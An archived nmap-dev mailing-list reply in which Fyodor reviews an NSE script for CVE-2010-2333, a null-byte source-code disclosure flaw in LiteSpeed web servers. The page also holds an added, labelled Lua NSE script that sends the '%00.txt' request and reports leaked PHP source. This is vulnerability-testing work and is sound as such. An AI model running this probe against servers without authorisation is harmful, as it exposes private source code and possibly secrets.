Nmap Development mailing list archives
Re: http-litespeed-sourcecode-download
From: Fyodor <fyodor () insecure org>
Date: Thu, 21 Jul 2011 03:14:05 -0700
On Fri, Jul 15, 2011 at 06:25:32PM -0700, Paulino Calderon wrote:
> description = [[ http-litespeed-sourcecode-download.nse exploits a null-byte poisoning vulnerability in Litespeed Web Servers 4.0.x before 4.0.15 to retrieve the target script's source code by sending an HTTP request with a null byte followed by a .txt file extension (CVE-2010-2333).
Thanks Paulino. Here are some suggestions:

o It needs an @output example--that section is currently empty.

o Ideally it should try to detect the vulnerability even if the user doesn't specify http-litespeed-sourcecode-download.uri. Otherwise far fewer people will ever make use of this script. Allowing the file to be specified is great for exploiting the bug, but it would be nice to find a way to detect it without requiring that.

o I know you are looking for ways to test it out on a real system, so I hope that goes well.

o It returns an error if the uri option is not specified, but people do things like "--script vuln" all the time and we don't want an error message showing for each host. Ideally though, the fix will be to do useful things (e.g. detect the vuln) even without requiring the argument.

o The name http-litespeed-sourcecode-download is pretty long, and it doesn't even contain "vuln" or the CVE number. But it includes a lot of other good details. So I can't think of any name that I think is clearly better. So this is probably OK.

o The @usage example gives the argument name as http-litespeed-sourcecode-download.file, but in the @args section and in the actual code it is .uri rather than .file.

o Even though the filename doesn't have a CVE number, the output should probably include it. As I mentioned with http-axis2-dir-traversal, we should aim to report this in a reasonably common way (even though we don't have the special vuln reporting library yet).

I hope this helps. Feel free to check it in if you can address these issues and nobody else finds any other ones.

Cheers,
Fyodor

_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/
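The following is an added illustration of the review points above (the .uri argument made optional with a default so "--script vuln" does not error, the @usage and @args names kept consistent, and the CVE id carried in the output); it is not the script from this thread nor Nmap's own code. It assumes the NSE libraries http, shortport and stdnse with their usual interfaces, and the default path /index.php and the "<?php" source marker are assumptions chosen for the example.

```lua
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"

description = [[
Checks whether a LiteSpeed web server discloses script source code when a
request path is suffixed with a null byte and ".txt" (CVE-2010-2333).
]]

---
-- @usage nmap -p80 --script http-litespeed-sourcecode-download <target>
-- @args http-litespeed-sourcecode-download.uri Script to request
--       (default: /index.php; assumed default for this example).
-- @output
-- 80/tcp open  http
-- | http-litespeed-sourcecode-download:
-- |_  VULNERABLE (CVE-2010-2333): source of /index.php disclosed (1234 bytes)

categories = {"vuln", "intrusive"}
portrule = shortport.http

action = function(host, port)
  -- Optional argument: fall back to a default instead of returning an error,
  -- so the script still does something useful under "--script vuln".
  local uri = stdnse.get_script_args(SCRIPT_NAME .. ".uri") or "/index.php"

  -- Only probe servers that identify themselves as LiteSpeed; other servers
  -- are reported as not applicable rather than as errors.
  local probe = http.get(host, port, "/")
  local server = probe and probe.header and probe.header["server"] or ""
  if not server:lower():find("litespeed", 1, true) then
    return nil
  end

  -- Percent-encoded null byte followed by ".txt", as the vulnerability
  -- description states; a disclosed PHP file starts with "<?php".
  local resp = http.get(host, port, uri .. "%00.txt")
  if resp and resp.status == 200 and resp.body
     and resp.body:find("<?php", 1, true) then
    return string.format(
      "VULNERABLE (CVE-2010-2333): source of %s disclosed (%d bytes)",
      uri, #resp.body)
  end

  -- Report the negative result with the CVE id as well, in the same format.
  return string.format("Not vulnerable (CVE-2010-2333) for %s", uri)
end
```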
Current thread:
- http-litespeed-sourcecode-download Paulino Calderon (Jul 15)
- Re: http-litespeed-sourcecode-download Fyodor (Jul 21)
- Re: http-litespeed-sourcecode-download Paulino Calderon (Jul 24)
- Re: http-litespeed-sourcecode-download Fyodor (Jul 21)